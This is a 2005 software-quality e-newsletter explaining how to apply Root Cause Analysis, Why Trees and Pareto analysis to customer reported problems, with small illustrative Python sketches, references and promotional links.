Food for Thought: Getting to the Root of Customer Reported Problems
An e-newsletter published by Software Quality Consulting, Inc.
May 2005, Vol. 2 No. 5 

To view a web version of this newsletter, click on the following link:
http://www.swqual.com/newsletter/vol2/no5/vol2no5.html.

--------------------------------------------------------------------------------

Welcome to Food for Thought(TM), an e-newsletter from Software Quality 
Consulting (http://www.swqual.com/?Intro). I've created free subscriptions for
my valued business contacts. If you find this newsletter informative, I
encourage you to continue reading. Feel free to pass this newsletter along to
colleagues by clicking this Forward Email link
(http://ui.constantcontact.com/roving/sa/fp.jsp?plat=i&p=f&m=sctz69n6). If
you've received this newsletter from a colleague and would like to subscribe,
please click this Enter New Subscription link
(http://www.swqual.com/newsletter/Subscribe.htm). If you don't wish to receive
this newsletter, click the SafeUnSubscribe(TM) link at the bottom of this
newsletter, and you won't be bothered again.

Your continued feedback on this newsletter is most welcome. Please send 
your comments and suggestions to [email protected]. 

--------------------------------------------------------------------------------

In This Month's Topic, I discuss using Root Cause Analysis to find the 
real cause of Customer Reported Problems... 

Regular features to look for each month are:

- Monthly Morsels
  Hints, tips, techniques and reference info related to this month's topic 

- Calendar
  Conferences, workshops, and meetings of interest to software engineers, 
  QA engineers and anyone interested in software development 

--------------------------------------------------------------------------------

***This Month's Topic***

GETTING TO THE ROOT OF CUSTOMER REPORTED PROBLEMS

Of all the kinds of problems that software development organizations face, 
Customer Reported Problems (CRPs) are clearly the most important. This is 
because CRPs represent potential gaps in your knowledge of how your 
customers use your software. CRPs may be the result of deficiencies in 
your product marketing, software development, test, or fulfillment 
processes. CRPs can often result in unplanned releases that are both 
disruptive and expensive. 

When the underlying causes of CRPs are not fully understood, the result is 
often a poor solution that creates more problems than it solves. 
Nothing frustrates customers more than a supplier who is unable to resolve 
problems quickly and correctly.

MOTIVATION

By now, we should all know that the sooner a problem is found the easier 
and less costly it is to fix. Barry Boehm [1] demonstrated this almost 25 
years ago. Current data [2] suggest that even the most experienced 
developers inject one defect for every 10 lines of code they write. While 
effective testing can find up to 95% of these defects prior to release, 
that still leaves quite a few defects for customers to find. 
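
To put rough numbers on this, here is a minimal arithmetic sketch in 
Python. The 10,000-line program size is a hypothetical figure chosen only 
for illustration; the injection rate and the 95% removal rate are the 
figures quoted above, and the 95% is a best case. 

```python
# Illustrative arithmetic only; the program size is a made-up figure.
LINES_OF_CODE = 10_000       # hypothetical program size
LINES_PER_DEFECT = 10        # one defect injected per 10 lines, per [2]
TEST_REMOVAL_PERCENT = 95    # best case for effective testing

defects_injected = LINES_OF_CODE // LINES_PER_DEFECT
defects_found = defects_injected * TEST_REMOVAL_PERCENT // 100
defects_escaped = defects_injected - defects_found

print(f"injected:           {defects_injected}")
print(f"found by testing:   {defects_found}")
print(f"left for customers: {defects_escaped}")
```

Under these assumptions, 50 defects would still be waiting for customers 
to find. 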

Finding critical defects in your software is very disruptive not only for 
your customers but for your software development organization as well. 
Unplanned releases to fix CRPs divert expensive development resources from 
tasks that generate revenue (new features, new products, etc.) to tasks 
that don't generate revenue (bug fixes). Unplanned releases are clearly 
not good for your bottom line. 

CRPs represent more than just defects. CRPs should be broadly defined to 
include any failure of software and services (including code, 
documentation, installation, customization, fulfillment, training, etc.) 
that negatively impacts customers. 

ROOT CAUSE ANALYSIS 

Working in safety-critical industries has allowed me to become familiar 
with several tools not routinely used in the commercial software 
development industry. One such tool is called Root Cause Analysis (RCA). 
This tool is commonly used within a Six-Sigma framework. 

I've adapted the traditional RCA Process to make it work effectively 
within typical software development organizations. RCA helps people 
understand WHAT, WHY, and HOW an event (a CRP) occurred. 

Overview

RCA is routinely used to investigate the cause of major disasters 
including: 

- Airline crashes 
- Space Shuttle accidents 
- Chemical and nuclear plant disasters 

RCA helps us:

- understand causes of customer dissatisfaction 
- understand the what, the why, and the how... 
- reduce rework by preventing recurrence 
- identify process weaknesses 
- improve customer satisfaction 

In applying RCA to a typical software development organization, we need to 
keep in mind the fact that finding the root cause of a CRP may be 
difficult because:

- We often have an incomplete problem definition 
- Causal relationships are unknown 
- We tend to focus on finding quick solutions and assigning blame 

Let's now look at terms specific to the RCA process.

TERMINOLOGY

The RCA Process uses the following terms: 

Event - Any failure of software and services (including code, 
documentation, installation, customization, training, fulfillment, 
etc.) that impacts customers. A CRP is an example of an event.

Causal Factors - Factors that contribute to occurrence of an event.

Causal Relationships - Cause and effect sequence in which a specific 
action creates a condition that contributes to or results in an 
event.

Corrective Action - Specific actions taken to eliminate the root cause 
of a CRP. There are two kinds of Corrective Actions (CAs):

- Immediate CA is taken soon after a CRP is reported to help the customer 
  recover (examples: workaround, hot fix, etc.) 
- Long Term CA is taken to prevent recurrence. Long Term CA results in 
  changes to processes and procedures 

Root Cause - Cause that, if corrected, prevents recurrence of this and 
similar CRPs. 

Attributes of root causes: 
- Represent specific underlying causes of events... 
- Can be reasonably identified... 
- Can be fixed by Management... 
- Lead to effective corrective actions... 

Let's look a bit closer at the attributes of root causes:

- Root Causes represent specific underlying causes of CRPs 
  - The goal of RCA is to find specific underlying causes 
  - The more specific the investigation is about why a CRP occurred, the 
    easier it will be to arrive at CAs that will prevent recurrence 

- Root Causes can be reasonably identified...

  - The RCA investigation must be cost-effective
  - A good RCA Process helps keep ROI high 

- Root Causes can be fixed by Management... 

  - Management needs to know exactly why a CRP occurred before effective 
    CA can be taken to prevent recurrence
  - Vague root causes such as "user error", "software failure", or 
    "external factors" are not helpful because Management can't do much 
    about them


- Root Causes lead to effective Corrective Actions...
 
  - Corrective actions are directly related to the identified root causes 
  - Vague corrective actions mean that a specific root cause was not found 

Now that we have some terms defined, let's look at the Root Cause Analysis 
Process.

RCA PROCESS OVERVIEW

The RCA Process consists of investigating, understanding, and categorizing 
underlying root causes of observed CRPs. It can be best performed by a 
small cross-functional team and can be easily incorporated into your 
Defect Triage Process.

The RCA Process includes a detailed analysis based on gathering factual 
information obtained from:

- Available documents and records 
- Interviews with staff and customers 
- Brainstorming sessions with staff 

And the RCA Process uses simple tools including:

- Why Trees 
- Pareto Analysis 

An effective RCA Process helps determine appropriate and effective 
corrective actions by identifying both an Immediate Corrective Action 
(what should be done today to resolve the CRP) and Long Term Corrective 
Action (what should be done to prevent recurrence).

In applying the RCA Process, the Triage Team starts with a specific CRP 
and asks:

- What is it about the way we operate that allowed this CRP to occur? 

Most root causes are found in the way we operate. That includes:

-   Who does what? 
-   How things get done? 
-   Why we behave the way we do? 

The Triage Team asks questions about "Who does what", "How things get 
done", and "Why we behave the way we do" in order to identify factual 
information that can be helpful in identifying real root causes.

In asking these questions, the Triage Team uses a tool called the Why 
Tree. Why Trees are similar to Fault Trees in that the CRP is placed at 
the top. We then ask "Why did this happen?" and start drilling down into 
"Who does what", "How things get done", and "Why we behave the way we do". 
At each level, the team continues to ask "Why?", usually at least five 
times (though for simpler problems, fewer than five Whys may suffice).

The following illustrates a partially completed Why Tree for a simple 
problem: 

(see the image in the HTML version at
http://www.swqual.com/newsletter/vol2/no5/vol2no5.html)

Answers to Why questions may need to be determined from documents (like 
Functional Specifications, Test Plans, User Manuals, etc.), from records 
(like test results, shipping invoices, etc.), from interviews with staff 
and customers, and from brainstorming sessions.

The information shown in green circles on the Why Tree example represents 
probable root causes. The Triage Team reaches consensus on the most 
probable root cause(s). Often, there will be more than one root cause.
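
For readers who like to experiment, a Why Tree can be sketched as a small 
tree structure in Python. This is only an illustration and not part of the 
RCA Process itself: the names WhyNode, why, and probable_root_causes are 
hypothetical, the flag probable_root_cause stands in for the marking the 
team applies by consensus, and the sample CRP is invented (it is not the 
example from the HTML version). 

```python
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class WhyNode:
    """One box in a Why Tree: a statement plus the answers to 'Why?'."""
    statement: str
    probable_root_cause: bool = False  # set by team consensus
    children: List["WhyNode"] = field(default_factory=list)

    def why(self, answer: str, probable_root_cause: bool = False) -> "WhyNode":
        """Record one answer to 'Why did this happen?' and return it."""
        child = WhyNode(answer, probable_root_cause)
        self.children.append(child)
        return child


def probable_root_causes(node: WhyNode, depth: int = 0) -> List[Tuple[int, str]]:
    """Collect (depth, statement) for every node marked as a probable root cause."""
    found = [(depth, node.statement)] if node.probable_root_cause else []
    for child in node.children:
        found.extend(probable_root_causes(child, depth + 1))
    return found


# Hypothetical CRP, invented for illustration. The CRP sits at the top.
crp = WhyNode("Customer reports that the monthly report shows wrong totals")
rounding = crp.why("Totals are rounded before they are summed")
ambiguous = rounding.why("The rounding rule in the requirement was ambiguous")
ambiguous.why("The SRS review did not include anyone from Support",
              probable_root_cause=True)
untested = rounding.why("No test covered multi-line totals")
untested.why("The test plan was not traced back to the SRS",
             probable_root_cause=True)

for depth, statement in probable_root_causes(crp):
    print(f"Why #{depth}: {statement}")
```

Each call to why() adds one level, so the depth reported for a probable 
root cause shows how many times the team had to ask "Why?" to reach it. 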

Using the Why Tree, the Triage Team develops an Immediate CA (which could 
be a workaround, hot fix, patch, new CDs, new doc, etc.). The team also 
identifies effectiveness checks that can determine if the Immediate CA, 
once implemented, has effectively resolved the CRP.

Once the Immediate CA is implemented and the effectiveness checks are 
satisfactory, the Triage Team decides if a Long Term CA is needed. A Long 
Term CA would be appropriate if the root cause points to systemic 
problems. If so, they begin to develop a Long Term CA. The team does this 
by:

- Reviewing existing processes and procedures 
- Identifying process weaknesses directly related to root cause 
- Identifying potential process and procedure changes 
- Identifying long term effectiveness checks 

Once the team has completed work on the Long Term CA, it can be presented 
to Management and implemented. The team then collects data to determine if 
long term effectiveness checks are satisfactory.
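
The relationship between a Corrective Action and its effectiveness checks 
can be sketched in Python as follows. This is a simplified illustration 
under my own assumptions: the names CorrectiveAction, is_effective, and 
long_term_ca_warranted are hypothetical, each check is reduced to a simple 
pass/fail, and the sample hot fix and its checks are invented. 

```python
from dataclasses import dataclass, field
from typing import Dict


@dataclass
class CorrectiveAction:
    """A CA plus the effectiveness checks that confirm it worked."""
    description: str
    # check name -> True once the check has been judged satisfactory
    checks: Dict[str, bool] = field(default_factory=dict)

    def is_effective(self) -> bool:
        """A CA counts as effective only if it has checks and all pass."""
        return bool(self.checks) and all(self.checks.values())


def long_term_ca_warranted(immediate: CorrectiveAction, systemic: bool) -> bool:
    """Consider a Long Term CA once the Immediate CA works and the
    root cause points to a systemic problem."""
    return immediate.is_effective() and systemic


# Hypothetical Immediate CA, invented for illustration.
hot_fix = CorrectiveAction(
    "Ship hot fix for the failing export",
    checks={
        "customer confirms export works": True,
        "no repeat reports after the fix": False,
    },
)
print(long_term_ca_warranted(hot_fix, systemic=True))  # False: one check open

hot_fix.checks["no repeat reports after the fix"] = True
print(long_term_ca_warranted(hot_fix, systemic=True))  # True
```

The same structure could describe a Long Term CA, with long term 
effectiveness checks in place of the immediate ones. 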

Now let's identify the specific steps needed to perform an effective RCA.

RCA PROCESS STEPS

Step 1 - Data Collection 

The majority of time spent analyzing events will be spent gathering data. 
Complete information and a thorough understanding of events are required 
to identify causal factors and real root causes.

- Data collection begins with an accurate statement of what occurred in 
  the Customer's words:

  - Descriptions of CRPs are sometimes "filtered" by Technical Support. It 
    is critical that the original problem, stated in the Customer's words, 
    is recorded and reviewed by the team to prevent wasted effort... 
  - Data collection will initially be sketchy - use the Why Tree to 
    identify additional data to collect... 

- Collect general information about Customer. Some examples:

  - Is this Customer a power user or novice? 
  - Has this Customer received training? 
  - Is this Customer's use and/or data unique? 

- Collect information about the Customer's environment. Some examples: 

  - Does this Customer have a standard release or customer-specific 
    release? 
  - What are their platform/database/operating system releases? 
  - Have they received hot fixes recently? Are they installed?

Your Technical Support staff should gather this information by using a
checklist of questions to ask when Customers report problems. 
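
One way to picture such a checklist is as a record with one field per 
question, where unanswered questions are easy to spot. The Python sketch 
below is an assumption about how this might look, not a prescribed 
format: the name CrpIntake, the helper unanswered, and all field names 
are hypothetical, and the sample report is invented. 

```python
from dataclasses import dataclass, fields
from typing import List, Optional


@dataclass
class CrpIntake:
    """Answers Technical Support collects when a Customer reports a problem.
    None means the question has not been answered yet."""
    problem_in_customer_words: Optional[str] = None
    power_user_or_novice: Optional[str] = None
    received_training: Optional[bool] = None
    unique_use_or_data: Optional[bool] = None
    standard_or_custom_release: Optional[str] = None
    platform_db_os_releases: Optional[str] = None
    recent_hot_fixes_installed: Optional[bool] = None


def unanswered(intake: CrpIntake) -> List[str]:
    """Return the names of checklist questions that still have no answer."""
    return [f.name for f in fields(intake) if getattr(intake, f.name) is None]


# Hypothetical report, invented for illustration.
report = CrpIntake(
    problem_in_customer_words="The export button does nothing when I click it.",
    received_training=False,
    standard_or_custom_release="standard",
)

# Questions Technical Support still needs to ask.
print(unanswered(report))
```

Keeping the problem statement as a free-text field makes it natural to 
record it exactly as the Customer said it. 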

Step 2 - Determine What Happened

The Triage Team starts with the CRP in the Customer's words and asks "Why 
did this happen?" As they start to drill down, they create the Why Tree 
and continue asking "Why?" until there are no more answers. Usually, you 
need to ask "Why?" a minimum of 5 times. 

This process will identify additional information to collect. For example:

-   Was the requirement defined in the Software Requirements Spec? 
-   Was the requirement ambiguous? 
-   Was the requirement tested? If so, how? 
-   Was the testing effective? 
-   Was user training provided? Was it effective? 
-   Are there platform, environment, or configuration issues? 

When the team is satisfied that they have answered all the relevant 
questions and gathered all relevant information, the team is then ready to 
identify potential root causes.

Step 3 - Root Cause Identification

Based on the Why Tree, the Triage Team reviews the results and identifies 
the most probable root causes. The team ensures that these root causes 
meet the following criteria:

-   They represent specific underlying causes of events... 
-   They can be reasonably identified... 
-   They can be fixed by Management... 
-   They can lead to effective corrective actions... 

Once the team is satisfied that they have identified the most probable 
root cause(s), they document their results.

With this information, the team can then identify an Immediate CA. These 
actions can be taken immediately to help resolve the original CRP. 
Effectiveness checks are included as part of the Immediate CA.

Step 4 - Long Term Corrective Action

Once an Immediate CA is implemented and determined to be effective, the 
Triage Team decides if a Long Term CA is warranted. Usually, root causes 
that identify underlying systemic problems are good candidates. Also, once 
root causes are identified, they should be added to a list, as illustrated 
below:

Example Root Cause List

1 Requirement was defined in SRS but not tested 
2 Requirement was tested but test was inadequate 
3 Requirement was not defined in SRS 
4 Requirement was in SRS but was ambiguous 
5 Code was incorrect - Code review not held 
6 Code was incorrect - Code review held but didn't catch it 
7 Installation or configuration issues... 
8 Version compatibility issues... 
9 User training issues... 
10 etc... 

The Pareto Principle tells us that, in many cases, 80% of all problems 
result from only 20% of root causes. Performing a Pareto Analysis based on 
the Root Cause List can help determine what areas should be the focus of 
Long Term CA in order to keep the ROI high.

The following example illustrates a simple Pareto Analysis of observed 
root causes and their associated CRPs.

Example of Simple Pareto Analysis of Observed Root Causes
CRP    RC #1    RC #2    RC #3    RC #4 
10002    x                 x   
10014             x        x        x 
10045             x     
10345    x        x                 x 
16778             x     
17889   
18779             x     
19921             x     
19992   
20001             x     
total    2        7        2        2 

From this analysis it is clear that addressing Root Cause #2 with a Long 
Term CA would have the highest ROI. The Triage Team would identify and 
propose a Long Term CA and present recommendations to Management. Included 
with this are effectiveness checks. Once implemented, data is collected 
and reviewed by the Triage Team to ensure that the systemic issues have 
been effectively eliminated.
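
The tally in the example table is simple enough to do by hand, but it can 
also be sketched in a few lines of Python. The data below is copied from 
the example table; the variable names are my own, and the cumulative 
percentage column is an addition that is commonly shown in Pareto charts 
rather than something taken from the table. 

```python
from collections import Counter

# CRP number -> root cause numbers observed, copied from the example table.
observed = {
    10002: [1, 3],
    10014: [2, 3, 4],
    10045: [2],
    10345: [1, 2, 4],
    16778: [2],
    17889: [],
    18779: [2],
    19921: [2],
    19992: [],
    20001: [2],
}

# Count how many CRPs each root cause contributed to.
totals = Counter(rc for causes in observed.values() for rc in causes)
grand_total = sum(totals.values())

# List root causes from most to least frequent with a running percentage.
running = 0
for rc, count in totals.most_common():
    running += count
    share = 100 * running / grand_total
    print(f"RC #{rc}: {count:2d}   cumulative {share:.0f}%")
```

Root Cause #2 comes out on top with 7 of the 13 observations, which 
matches the totals row in the table. 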

IN SUMMARY...

Incorporating RCA into your Triage Process can lead to several benefits:

-   Increases your ability to discover real root causes 
-   Helps identify WHAT, WHY, and HOW 
-   Leads to effective immediate and long term corrective actions 
-   Improves Customer Satisfaction 
-   Reduces rework and eliminates unplanned releases 

By incorporating Root Cause Analysis into your Triage Process, the 
resolution of your CRPs will be more effective and your customers will 
certainly be happier.

Till next time...

--------------------------------------------------------------------------------

***Monthly Morsel***

Every month in this space you'll find additional information related to 
this month's topic.

  References:

  [1] Boehm, B., Software Engineering Economics, Prentice-Hall, 1981

  [2] Humphrey, W., A Discipline for Software Engineering, Addison-Wesley, 
  1995.

  [3] Gano, D., et al., Apollo Root Cause Analysis - A New Way Of 
  Thinking, Apollonian Publications, 1999

  [4] US Dept of Energy, Root Cause Analysis Guidance Document, 
  DOE-NE-STD-1004-92, February 1992
  A technical guidance document on how to perform traditional root cause 
  analysis, primarily used for investigating nuclear power plant 
  accidents. (http://www.eh.doe.gov/techstds/standard/nst1004/nst1004.pdf)

  [5] Rooney, J. and Vanden Heuvel, L., "Root Cause Analysis for 
  Beginners", ASQ Quality Progress, July 2004, p. 45-53
  A good paper to read for an overview of the traditional Root Cause 
  Analysis process... 
  (http://www.asq.org/pub/qualityprogress/past/0704/qp0704rooney.pdf)

  [6] Fagerhaug, T., and Andersen, B. (ed.), Root Cause Analysis: 
  Simplified Tools and Techniques, ASQ Quality Press, 1999. 
  
  On-line Resources: 

  Software Forensics Centre at the School of Computing Science, 
  Middlesex University (UK)
  An interesting site with lots of resources related to software 
  failures (http://www.cs.mdx.ac.uk/research/SFC/index.html)

  ASQ Quality Press
  Search ASQ's on-line bookstore for books and resources on Root Cause 
  Analysis (http://qualitypress.asq.org/index.html)

--------------------------------------------------------------------------------

***Calendar***

Every month, you'll find news here about local and national events that 
are of interest to the software community...

  Software Quality Calendar

  There are many organizations that sponsor monthly meetings, workshops, 
  and conferences of interest to software professionals. Find out what's 
  happening... (http://www.swqual.com/links/upcoming.html)
  
  Workshops Offered by Software Quality Consulting

  Software Quality Consulting offers workshops in many topics related to 
  software process improvement. Get more info... 
  (http://www.swqual.com/seminars/courses.html)

--------------------------------------------------------------------------------

***About SQC***

Software Quality Consulting provides consulting, training, and auditing 
services tailored to meet the specific needs of clients. We help clients 
fine-tune their software development processes and improve the quality of 
their software products. The overall goal is to help clients achieve 
Predictable Software Development(TM), so that organizations can consistently 
deliver quality software with promised features in the promised timeframe.
To learn more about how we can help your organization, visit our web site
(http://www.swqual.com/) or send us an email ([email protected]).

--------------------------------------------------------------------------------

I hope this newsletter has been informative and helpful. Your comments and 
feedback are most welcome. Send me your feedback... ([email protected])
Thanks,

Steve Rakitin
[email protected]


Food for Thought and Predictable Software Development are trademarks of Software 
Quality Consulting, Inc. 
Copyright (c) 2005. Software Quality Consulting, Inc. All rights reserved. Graphic 
design by Sage Studio  
